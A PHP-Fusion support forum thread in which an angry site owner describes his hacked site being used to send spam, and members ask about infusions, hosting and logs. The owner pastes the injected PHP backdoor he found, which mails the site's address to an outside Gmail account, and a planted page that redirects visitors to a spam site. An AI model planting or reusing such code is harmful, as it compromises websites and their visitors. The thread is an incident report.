My site was hacked with spam script: The Chill Out Zone

Home
Search

Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.

i had outlaws gameroom running fine for a while using php fusion, i dont know how the hell the do it, but somebody inserted a spamming script on my pages, it was verified by my hosting, that it was sending out Spam, i cant prove it, but i think it was one of those infusions i downloaded and installed on my site, i mean how else could a jackass sabotage somebodys website, right? I'll hand it to the **** that was genius enough to screw my site up, YOU
F***ing suck, this thread will probably get my banned, but hell i dont give a rats ass, YALL F***ed my site anyway and did a marvelous job at it too, The Outlaws middle finger is up in the air for you creeps, F*** that have both middle fingers, any blue collar webmasters on here reading this? be careful with what you install, these are some smart ****s, they will F*** you and your site and not even bat an eye when they do.

OUTLAW is F***ing outta here

/Edited thread title to reflect issue/Richard

Edited by Homdax on 06-04-2013 19:09, 11 y

0 replies

Hi Outlalw,

Hopefully your more chilled out now and relaxed.

So let's fix it man, tell me which infusions you are using, i know since it's games you use Varcade, that is not the issue, which other infusions you using.

Can you get a hold of your Access logs so we can run through them to try and see where and how the spam attack took place.

Send me a pm with your logs if you want.

Regards
Craig

0 replies

Craig my man, i know it wasnt you, that flamed outlawsgameroom, let me send you a pm, i dont trust any of these other guys

0 replies

Sorry to read such news from one of our community friends,Can you update this thread and tell us what infusion it was when you find out ?

0 replies

More important: Are you on shared hosting or on a private VPS or dedicated server. Is basedir restriction set?

Especially when on shared hosting the initial hack could be in another srcipt / website and then spread to yours.

Everyone with hacking problems should mention the above to get a better understanding where the leak is coming from.

0 replies

i dont know which infusion it was, why was Craig suspended? is it because he can help some of us? i had a few infusions on the site that i thought? was a big improvement, but one of them gave somebody the ability to SEND Spam, the guy is probably laughing his head off right now, Well Touche' you have beat the OUTLAW and a few other cool webmasters on here, but i cant figure out why?
1, there is no financial gain
2. is it just a personal thing he or she has against php-fusion if it is, the only thing i lost is a lot of time building the site, sending spam aint gonna make him a damn dime

it goes on and on

0 replies

I have been following this thread carefully as I'm sure have many others. So far I have read that you are certain that one of the infusions you have installed has created the problem with sending SPAM, but you have not mentioned which infusion it is or why you are certain that it is an infusion that caused the problem. Please be more specific about which infusion it is so that the rest of us can avoid it or uninstall it if it has already been infused?

0 replies

Quote

Wanabo wrote:

More important: Are you on shared hosting or on a private VPS or dedicated server. Is basedir restriction set?

Especially when on shared hosting the initial hack could be in another srcipt / website and then spread to yours.

Everyone with hacking problems should mention the above to get a better understanding where the leak is coming from.

agrees with Wanabo
I myself would like to know
please tell us your situation,
hosting/ shared?
infusion name?
logs?
additional information would benefit the entire community ..
I hope their can be a resolution to your problem soon.

Quote

as for requesting on Craigs current activity here,I can not comment.

0 replies

Fellas, The Outlaw doesnt know which infusion, i believe it was a shared hosting, logs? i didnt see any access logs, all i can tell you it had to be one of them programs "Infusions" that injected the spam script, Yall got some smart people on here that can screw a fellas site, i read the F***ing forums too, my site isnt the only one they screwed.
how in the hell did the WP files got there? yes i found wordpress files on my hosting, does php-fusion run through wordpress. i put a lot of work on my site and its gone, i even tried to start over and they fixed it so when you TRY creating a database? you keep coming up with a wrong password for it, very GENIUS

0 replies

about a month ago, i did upgrade my php-fusion to 7.2.6 that is the latest version right?

0 replies

hey!!!! fellas i was checking the the files again? and found this at the very top of the page, this is what my hosting told me that was sending out spam, i dont know what the hell it is

Code Download source

<?php if(isset($_GET["t8607n"])){ 

if(!@extension_loaded('zip')){exit;}
function echh($c,$s){echo("<small><FONT style='BACKGROUND-COLOR:#$c'>$s</FONT></small><br><br>");}
$s="";foreach(str_split($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']) as $v){$s.="$v ";}

if(@mail("comua9@gmail.com","Hi!",$s)){
   echh('00FF00','Message successfully sent!');
} else {
   echh('FF0000','Message delivery failed...');
}
if(!@extension_loaded('zip')){
   echh('FF0000','ZIP module is exist!!! Upload you your template manualy.');
} else {
   echh('00FF00','ZIP module is loaded.');
}

 exit; } ?>

Edited by Homdax on 07-04-2013 09:43, 11 y

0 replies

im checking the administrating folder somebody upload these files thats not in my files on my computer
1. aCvq.html
2. Ujlogin.php
3. info1qo.php
4. configuH68.php inside this file is

Code Download source

<html>
<head>                                                                                                                                                                                                                                                <meta http-equiv="refresh" content="2; url=http://rapperrating.com/listQMg3/bar/index.html">
</head>
<body>
<h1>Loading...</h1>
</body>

Edited by Homdax on 07-04-2013 09:43, 11 y

0 replies

Outlaw, frankly, you NEED to have control over your site and KNOW what you do with it and what infusions you install and where you got them from.

As of right now, I do not think any of us have even a remote clue as to how to help you, because you do not give relevant info.

Also, if you post code, please use the code tags.

0 replies

I had a similar attack to this done on a WP site I hosted, an old vulnerable script had been left in the theme folder, so maybe if you were using something ported from wordpress that could have been the problem?

0 replies

Reload86, them wordpress files wasnt there when i started the site, i wasnt using NOTHING from wordpress and Richard Ainz, you are probably right, since you the site admin, your probably one of them people with a itchy mouse button finger looking at BAN USER at every second, lmao HEY answer the OUTLAW this? why did yall suspend craig?

0 replies

He is active now...

0 replies

Quote

your probably one of them people with a itchy mouse button finger looking at BAN USER at every second, lmao HEY answer the OUTLAW this? why did yall suspend craig?

Keep on topic to get your site straightened out, or continue challenging my ban trigger. It is up to you, Outlaw.

0 replies

On Post #11 you mention this section of code. Where was this, and what was the file name? Top of which page?

Your host can not inform you of the origin of this file?

0 replies

Quote

KasteR wrote:

On Post #11 you mention this section of code. Where was this, and what was the file name? Top of which page?

Your host can not inform you of the origin of this file?

it was on the top of everyone of them, but i re uploaded the pages in the main directory, but the admin folder has 3 to 4 files that wasnt there before

0 replies

Quote

Richard Ainz wrote:

Quote
your probably one of them people with a itchy mouse button finger looking at BAN USER at every second, lmao HEY answer the OUTLAW this? why did yall suspend craig?
Keep on topic to get your site straightened out, or continue challenging my ban trigger. It is up to you, Outlaw.

mr Outlaw to you, how could you let the software get outdated, it had to be a weakness in the software or the infusions

0 replies

Category Forum

Announcements & Security Issues

Labels

None yet

Statistics

Views 0 views
Posts 26 posts
Votes 0 votes
Topic users 11 members

11 participants

Notifications

Track thread

You are not receiving notifications from this thread.

My site was hacked with spam script

26 posts

PHPFusion

Resources

Community

Development